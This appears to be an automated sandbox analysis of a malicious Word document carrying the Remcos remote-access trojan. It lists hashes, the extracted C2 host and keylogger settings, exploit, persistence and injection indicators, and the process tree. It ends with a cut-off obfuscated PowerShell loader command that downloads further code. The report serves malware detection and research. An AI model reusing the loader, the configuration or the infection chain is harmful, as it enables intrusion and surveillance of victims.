remcos | 0eab45741c6d3abdb145b7c928d045dc77cf3def915d017abc388c2c38da8137

Analysis

max time kernel
151s
max time network
135s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
18-04-2024 01:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0eab45741c6d3abdb145b7c928d045dc77cf3def915d017abc388c2c38da8137.docx
Size

558KB
MD5

bb683a0e1b197cab5dce152e9355983f
SHA1

48dab24779ecf13e3c130107e950514e46046c11
SHA256

0eab45741c6d3abdb145b7c928d045dc77cf3def915d017abc388c2c38da8137
SHA512

2ab668822fe5742dc4d69e6f0ffebbc2edf01832d997a414b36db0fad71b1c63dac633358a6ef1b6211df8e367a7e87e533ab20d8b6c29ed82d02ab6449fc7f3
SSDEEP

12288:1IAODfjgJ4h1dPjcXUk+MifcXUk+MiQWHOOkxogMm+JJgiXSV3VNycXUk+Mid:KvY4h7P4XUQXUUWHOOkdMm+JJgioVNPa

Score

10^/10

remcos remotehost persistence rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

sembe.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
notess
keylog_path
%AppData%
mouse_option
false
mutex
Rmc-P0AEMX
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 21 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1924-337-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1924-339-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1924-341-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1924-346-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1924-344-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1924-350-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1924-352-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1924-355-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1924-356-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1924-360-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1924-358-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1924-361-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1924-362-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1924-363-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1924-364-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1924-365-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1924-370-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1924-371-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1924-408-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1924-412-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1924-413-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM

Blocklisted process makes network request 8 IoCs

Processes:

EQNEDT32.EXEWScript.exepowershell.exe

flow	pid	process
10	2700	EQNEDT32.EXE
13	308	WScript.exe
15	308	WScript.exe
19	2684	powershell.exe
21	2684	powershell.exe
23	2684	powershell.exe
25	2684	powershell.exe
26	2684	powershell.exe

Abuses OpenXML format to download file from external location

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\NEW.vbs"	powershell.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2684 set thread context of 1924 2684 powershell.exe RegAsm.exe
Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

2700 EQNEDT32.EXE

description	pid	process	target process
PID 2684 set thread context of 1924	2684	powershell.exe	RegAsm.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

pid	process
2700	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1832 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

676 powershell.exe
2684 powershell.exe
2056 powershell.exe

pid	process
1832	WINWORD.EXE

pid	process
676	powershell.exe
2684	powershell.exe
2056	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exeWINWORD.EXE

description	pid	process
Token: SeDebugPrivilege	676	powershell.exe
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeDebugPrivilege	2056	powershell.exe
Token: SeShutdownPrivilege	1832	WINWORD.EXE

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

WINWORD.EXERegAsm.exe

pid process

1832 WINWORD.EXE
1832 WINWORD.EXE
1924 RegAsm.exe

pid	process
1832	WINWORD.EXE
1832	WINWORD.EXE
1924	RegAsm.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

EQNEDT32.EXEWScript.exeWINWORD.EXEpowershell.exepowershell.exe

description	pid	process	target process
PID 2700 wrote to memory of 308	2700	EQNEDT32.EXE	WScript.exe
PID 2700 wrote to memory of 308	2700	EQNEDT32.EXE	WScript.exe
PID 2700 wrote to memory of 308	2700	EQNEDT32.EXE	WScript.exe
PID 2700 wrote to memory of 308	2700	EQNEDT32.EXE	WScript.exe
PID 308 wrote to memory of 676	308	WScript.exe	powershell.exe
PID 308 wrote to memory of 676	308	WScript.exe	powershell.exe
PID 308 wrote to memory of 676	308	WScript.exe	powershell.exe
PID 308 wrote to memory of 676	308	WScript.exe	powershell.exe
PID 1832 wrote to memory of 2032	1832	WINWORD.EXE	splwow64.exe
PID 1832 wrote to memory of 2032	1832	WINWORD.EXE	splwow64.exe
PID 1832 wrote to memory of 2032	1832	WINWORD.EXE	splwow64.exe
PID 1832 wrote to memory of 2032	1832	WINWORD.EXE	splwow64.exe
PID 676 wrote to memory of 2684	676	powershell.exe	powershell.exe
PID 676 wrote to memory of 2684	676	powershell.exe	powershell.exe
PID 676 wrote to memory of 2684	676	powershell.exe	powershell.exe
PID 676 wrote to memory of 2684	676	powershell.exe	powershell.exe
PID 2684 wrote to memory of 2056	2684	powershell.exe	powershell.exe
PID 2684 wrote to memory of 2056	2684	powershell.exe	powershell.exe
PID 2684 wrote to memory of 2056	2684	powershell.exe	powershell.exe
PID 2684 wrote to memory of 2056	2684	powershell.exe	powershell.exe
PID 2684 wrote to memory of 1924	2684	powershell.exe	RegAsm.exe
PID 2684 wrote to memory of 1924	2684	powershell.exe	RegAsm.exe
PID 2684 wrote to memory of 1924	2684	powershell.exe	RegAsm.exe
PID 2684 wrote to memory of 1924	2684	powershell.exe	RegAsm.exe
PID 2684 wrote to memory of 1924	2684	powershell.exe	RegAsm.exe
PID 2684 wrote to memory of 1924	2684	powershell.exe	RegAsm.exe
PID 2684 wrote to memory of 1924	2684	powershell.exe	RegAsm.exe
PID 2684 wrote to memory of 1924	2684	powershell.exe	RegAsm.exe
PID 2684 wrote to memory of 1924	2684	powershell.exe	RegAsm.exe
PID 2684 wrote to memory of 1924	2684	powershell.exe	RegAsm.exe
PID 2684 wrote to memory of 1924	2684	powershell.exe	RegAsm.exe
PID 2684 wrote to memory of 1924	2684	powershell.exe	RegAsm.exe
PID 2684 wrote to memory of 1924	2684	powershell.exe	RegAsm.exe
PID 2684 wrote to memory of 1924	2684	powershell.exe	RegAsm.exe
PID 2684 wrote to memory of 1924	2684	powershell.exe	RegAsm.exe
PID 2684 wrote to memory of 1924	2684	powershell.exe	RegAsm.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0eab45741c6d3abdb145b7c928d045dc77cf3def915d017abc388c2c38da8137.docx"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1832

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2032

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2700

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\lovetokissherlipswithlovers.vbs"
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:308

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTrea